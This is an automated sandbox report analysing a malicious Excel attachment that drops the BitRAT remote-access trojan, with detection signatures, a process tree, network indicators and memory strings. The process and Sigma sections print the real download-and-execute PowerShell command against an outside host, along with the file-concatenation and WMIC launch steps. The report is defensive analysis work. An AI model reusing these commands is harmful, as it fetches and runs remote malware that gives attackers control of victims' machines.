Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Scanned_25526662-Payment.xls

Overview

General Information

Sample Name:Scanned_25526662-Payment.xls
Analysis ID:337288
MD5:cd7d4543958945e3fab4f0631e3494f3
SHA1:3e00f26ab9384c9c1bb24eeb2de331f751f536ed
SHA256:b7a919bb30c1633483399356aedf42c11656c8a076be969e85b57ccdd071b879
Tags:BitRATRATStratoxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 BitRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected BitRAT
Contains functionality to create processes via WMI
Contains functionality to hide a thread from the debugger
Creates processes via WMI
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Hides threads from debuggers
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6560 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • cmd.exe (PID: 6884 cmdline: cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )) MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6940 cmdline: PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )) MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • csc.exe (PID: 3868 cmdline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline' MD5: 350C52F71BDED7B99668585C15D70EEA)
          • cvtres.exe (PID: 3596 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP' MD5: C09985AE74F0882F208D75DE27770DFA)
        • cmd.exe (PID: 3144 cmdline: 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • cmd.exe (PID: 6588 cmdline: 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • WMIC.exe (PID: 1636 cmdline: WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
  • Test3.jpg (PID: 4928 cmdline: C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: 19387B30D6DBE83E31D3CAC884280D93)
    • Test3.jpg (PID: 3180 cmdline: C:\Users\user\AppData\Local\Temp\Test3.jpg MD5: 19387B30D6DBE83E31D3CAC884280D93)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Scanned_25526662-Payment.xlsPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x1d3ef:$s1: PoWErsHEll
Scanned_25526662-Payment.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\1BA10000PowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x1cc71:$s1: PoWErsHEll

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: Test3.jpg PID: 3180JoeSecurity_BitRATYara detected BitRATJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6940, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline', ProcessId: 3868
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )), CommandLine: cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6560, ProcessCommandLine: cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )), ProcessId: 6884
      Sigma detected: Suspicious Csc.exe Source File FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6940, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline', ProcessId: 3868

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgAvira: detection malicious, Label: TR/Dropper.Gen
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\Test1.txtReversingLabs: Detection: 36%
      Multi AV Scanner detection for submitted fileShow sources
      Source: Scanned_25526662-Payment.xlsVirustotal: Detection: 14%Perma Link
      Source: Scanned_25526662-Payment.xlsReversingLabs: Detection: 15%
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\Test1.txtJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_00426ED0 __vbaAryLock,__vbaAryUnlock,#644,#644,__vbaStrCat,__vbaStrMove,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStr,#644,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStr,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_00426B80 __vbaAryLock,__vbaAryUnlock,__vbaAryLock,__vbaStrVarCopy,__vbaStrMove,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarMove,__vbaVarMove,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaLenBstrB,CryptHashData,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarZero,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaAryLock,__vbaAryLock,CryptDecrypt,__vbaAryUnlock,__vbaRedimPreserve,__vbaFreeStr,
      Source: Test3.jpg, 0000001B.00000002.361415384.00000000030E0000.00000040.00000001.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError,

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
      Source: global trafficDNS query: name: lankarecipes.com
      Source: global trafficTCP traffic: 192.168.2.3:49731 -> 192.185.236.165:80
      Source: global trafficTCP traffic: 192.168.2.3:49731 -> 192.185.236.165:80
      Source: global trafficTCP traffic: 192.168.2.3:49734 -> 45.15.143.216:5210
      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
      Source: global trafficHTTP traffic detected: GET /Sparc.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: lankarecipes.comConnection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: unknownTCP traffic detected without corresponding DNS query: 45.15.143.216
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_00415B0A WSARecv,
      Source: global trafficHTTP traffic detected: GET /Sparc.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: lankarecipes.comConnection: Keep-Alive
      Source: unknownDNS traffic detected: queries for: lankarecipes.com
      Source: PowerShell_transcript.648351.+jaH7BR7.20210108094000.txt.3.drString found in binary or memory: http://lankarecipes.com/Sparc.jp
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.aadrm.com/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.cortana.ai
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.office.net
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.onedrive.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://augloop.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://cdn.entity.
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://clients.config.office.net/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://config.edge.skype.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://cortana.ai
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://cortana.ai/api
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://cr.office.com
      Source: Test3.jpg, Test3.jpg, 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://dev.cortana.ai
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://devnull.onenote.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://directory.services.
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://graph.windows.net
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://graph.windows.net/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://lifecycle.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://login.windows.local
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://management.azure.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://management.azure.com/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://messaging.office.com/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://ncus-000.contentsync.
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://officeapps.live.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
